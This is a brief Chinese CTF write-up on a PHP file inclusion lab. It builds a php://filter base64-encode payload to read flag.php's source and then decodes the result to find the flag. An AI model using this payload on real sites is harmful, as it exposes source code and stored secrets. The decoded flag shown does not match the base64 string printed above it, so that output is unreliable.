文件包含漏洞-Include(读取源码)


文件包含漏洞-Include(读取代码)

1.靶场环境

然后点击一下tips:

然后就是这些,但是url中有?file=flag.php 猜测文件包含漏洞,尝试

文件包含直接读取的是文件,而不是文件源码,所以要想办法读取源码

php://filter/read=convert.base64-encode/resource=xxx.php

这个方法可以读取代码

然后构造payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

2.然后得到对应字符串“XXXXXXX="以 = 结尾的字符串

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NWRiZmRhNTMtODUxYi00MzIwLTgxMzktMTIyYjBkOGEyNmQ0fQo=

不难看出这是base64加密的字符串,进行base64解密得到flag:

<?php
echo "Can you find out the flag?";
//flag{63e2b2c0-5f92-462e-adbf-e0588a34428c}


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM